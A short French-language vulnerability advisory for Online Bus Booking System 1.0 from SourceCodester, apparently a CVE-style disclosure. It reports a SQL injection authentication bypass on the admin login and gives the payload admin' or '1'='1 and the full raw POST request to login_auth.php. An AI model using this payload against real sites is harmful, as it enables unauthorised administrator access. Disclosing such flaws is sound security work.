
Online Bus Booking System 1.0, il existe un contournement de l'authentification sur l'écran de connexion Admin dans admin.php via une injection SQL sur le nom d'utilisateur ou le mot de passe.
Online Bus Booking System 1.0, il y a un contournement d'authentification sur l'écran de connexion administrateur dans admin.php via une injection SQL dans le nom d'utilisateur ou le mot de passe.
#Fournisseur - SourceCodester
#Produit -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0
#Type de vulnérabilité - Contournement d'authentification
#Composant affecté - bus_booking/admin.php
#Type d'attaque- Locale
#Élévation de privilèges - true
#Impact Exécution de code - true
Vecteur d'attaque
Accédez au panneau de connexion administrateur et essayez de le contourner
Dans la charge utile de la requête, définissez
username : admin' or '1'='1
password : admin' or '1'='1
POST /bus_booking/login_auth.php HTTP/1.1
Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0
username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1
Connexion réussie au tableau de bord administrateur